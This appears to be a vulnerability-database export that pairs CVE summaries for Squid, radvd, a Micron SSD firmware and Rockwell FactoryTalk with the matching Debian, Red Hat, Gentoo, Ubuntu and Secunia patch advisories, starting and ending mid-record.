http://www.cisco.com/go/psirt +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (SunOS) iFcDBQFOb9w/QXnnBKKRMNARCBomAP9pCiRwCB8z3oe3IWB2XXNzeaQxAwoq0gQ4 6znwu3lLSAD/Y6o+u8AofSMxkj3THWIdpbjVXKQXMal/BhxDhN5fsI8= =Ybok -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-202409-0304 Micron Crucial MX500 Series Solid State Drives M3CR046 is vulnerable to Buffer Overflow, which can be triggered by sending specially crafted ATA packets from the host to the drive controller. crucial of mx500 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-202408-2038 CVE-2024-7513 IMPACT A code execution vulnerability exists in the affected product. The vulnerability occurs due to improper default file permissions allowing any user to edit or replace files, which are executed by account with elevated permissions. Rockwell Automation FactoryTalk View SE is an industrial automation system view interface from Rockwell Automation of the United States
var-201109-0081 Buffer overflow in the gopherToHTML function in gopher.cc in the Gopher reply parser in Squid 3.0 before 3.0.STABLE26, 3.1 before 3.1.15, and 3.2 before 3.2.0.11 allows remote Gopher servers to cause a denial of service (memory corruption and daemon restart) or possibly have unspecified other impact via a long line in a response. NOTE: This issue exists because of a CVE-2005-0094 regression. Squid is a proxy server and web cache server. Squid is flawed in parsing responses from the Gopher server. If the Gopher server returns more than 4096 bytes, it can trigger a buffer overflow. This overflow can cause memory corruption to generally cause Squid to crash. A malicious user must set up a fake Gopher server and forward the request through Squid. Successful exploitation of vulnerabilities allows arbitrary code to be executed in a server context. Squid Proxy is prone remote buffer-overflow vulnerability affects the Gopher-to-HTML functionality. Failed exploit attempts will result in a denial-of-service condition. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA-2304-1 security@debian.org http://www.debian.org/security/ Nico Golde Sep 11, 2011 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : squid3 Vulnerability : buffer overflow Problem type : remote Debian-specific: no Debian bug : 639755 CVE IDs : CVE-2011-3205 Ben Hawkes discovered that squid3, a full featured Web Proxy cache (HTTP proxy), is vulnerable to a buffer overflow when processing gopher server replies. For the oldstable distribution (lenny), this problem has been fixed in version 3.0.STABLE8-3+lenny5. For the stable distribution (squeeze), this problem has been fixed in version 3.1.6-1.2+squeeze1. For the testing distribution (wheezy), this problem has been fixed in version 3.1.15-1. For the unstable distribution (sid), this problem has been fixed in version 3.1.15-1. We recommend that you upgrade your squid3 packages. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: squid security update Advisory ID: RHSA-2011:1293-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1293.html Issue date: 2011-09-14 CVE Names: CVE-2011-3205 ===================================================================== 1. Summary: An updated squid package that fixes one security issue is now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 3. Description: Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects. (CVE-2011-3205) Users of squid should upgrade to this updated package, which contains a backported patch to correct this issue. After installing this update, the squid service will be restarted automatically. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259 5. Package List: Red Hat Enterprise Linux Server (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/squid-3.1.10-1.el6_1.1.src.rpm i386: squid-3.1.10-1.el6_1.1.i686.rpm squid-debuginfo-3.1.10-1.el6_1.1.i686.rpm ppc64: squid-3.1.10-1.el6_1.1.ppc64.rpm squid-debuginfo-3.1.10-1.el6_1.1.ppc64.rpm s390x: squid-3.1.10-1.el6_1.1.s390x.rpm squid-debuginfo-3.1.10-1.el6_1.1.s390x.rpm x86_64: squid-3.1.10-1.el6_1.1.x86_64.rpm squid-debuginfo-3.1.10-1.el6_1.1.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/squid-3.1.10-1.el6_1.1.src.rpm i386: squid-3.1.10-1.el6_1.1.i686.rpm squid-debuginfo-3.1.10-1.el6_1.1.i686.rpm x86_64: squid-3.1.10-1.el6_1.1.x86_64.rpm squid-debuginfo-3.1.10-1.el6_1.1.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2011-3205.html https://access.redhat.com/security/updates/classification/#moderate 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2011 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFOcPqzXlSAg2UNWIIRAutlAJ9nlG0w3FNBVqFtxSNe10FKir/WkACeNQAA rDOr/svPTfi23jLvkODeYbk= =0hIH -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ---------------------------------------------------------------------- The Secunia CSI 5.0 Beta - now available for testing Find out more, take a free test drive, and share your opinion with us: http://secunia.com/blog/242 ---------------------------------------------------------------------- TITLE: Squid Gopher Response Processing Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA45805 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/45805/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=45805 RELEASE DATE: 2011-08-30 DISCUSS ADVISORY: http://secunia.com/advisories/45805/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/45805/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=45805 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Squid, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system. The vulnerability is caused due to a boundary error when processing Gopher responses and can be exploited to cause a buffer overflow via an overly long string. This is related to vulnerability #2 in: SA13825 The vulnerability is reported in versions 3.0.x prior to 3.0.STABLE25 and 3.1.x prior to 3.1.14 SOLUTION: Update to version 3.0.STABLE26 or 3.1.15. PROVIDED AND/OR DISCOVERED BY: The vendor credits Ben Hawkes, Google Security Team. ORIGINAL ADVISORY: http://www.squid-cache.org/Advisories/SQUID-2011_3.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ---------------------------------------------------------------------- The new Secunia Corporate Software Inspector (CSI) 5.0 Integrates with Microsoft WSUS & SCCM and supports Apple Mac OS X. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system. For more information: SA45805 SOLUTION: Apply updated packages via the apt-get package manager. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201110-24 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Squid: Multiple vulnerabilities Date: October 26, 2011 Bugs: #279379, #279380, #301828, #334263, #381065, #386215 ID: 201110-24 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities were found in Squid allowing attackers to execute arbitrary code or cause a Denial of Service. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-proxy/squid < 3.1.15 >= 3.1.15 Description =========== Multiple vulnerabilities have been discovered in Squid. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All squid users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-proxy/squid-3.1.15" NOTE: This is a legacy GLSA. Updates for all affected architectures are available since September 4, 2011. It is likely that your system is already no longer affected by this issue. References ========== [ 1 ] CVE-2009-2621 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2621 [ 2 ] CVE-2009-2622 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2622 [ 3 ] CVE-2009-2855 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2855 [ 4 ] CVE-2010-0308 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0308 [ 5 ] CVE-2010-0639 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0639 [ 6 ] CVE-2010-2951 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2951 [ 7 ] CVE-2010-3072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3072 [ 8 ] CVE-2011-3205 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3205 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201110-24.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201402-0028 The process_rs function in the router advertisement daemon (radvd) before 1.8.2, when UnicastOnly is enabled, allows remote attackers to cause a denial of service (temporary service hang) via a large number of ND_ROUTER_SOLICIT requests. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. An input validation vulnerability exists in the 'process_rs' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . ---------------------------------------------------------------------- Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool. Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/ ---------------------------------------------------------------------- TITLE: Debian update for radvd SECUNIA ADVISORY ID: SA46639 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46639/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46639 RELEASE DATE: 2011-10-31 DISCUSS ADVISORY: http://secunia.com/advisories/46639/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46639/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46639 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Debian has issued an update for radvd. This fixes a security issue and multiple vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service). For more information: SA46200 SOLUTION: Apply updated packages via the apt-get package manager. ORIGINAL ADVISORY: DSA-2323-1: http://www.debian.org/security/2011/dsa-2323 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE-----
var-201402-0027 The process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to cause a denial of service (stack-based buffer over-read and crash) via unspecified vectors. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A security vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. If used in unicast mode, a remote attacker could cause radvd outages, resulting in a denial of service. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . ---------------------------------------------------------------------- Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool. Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/ ---------------------------------------------------------------------- TITLE: Debian update for radvd SECUNIA ADVISORY ID: SA46639 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46639/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46639 RELEASE DATE: 2011-10-31 DISCUSS ADVISORY: http://secunia.com/advisories/46639/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46639/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46639 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Debian has issued an update for radvd. This fixes a security issue and multiple vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service). For more information: SA46200 SOLUTION: Apply updated packages via the apt-get package manager. ORIGINAL ADVISORY: DSA-2323-1: http://www.debian.org/security/2011/dsa-2323 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE-----
var-201402-0026 Buffer overflow in the process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a negative value in a label_len value. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A buffer overflow vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. If used in unicast 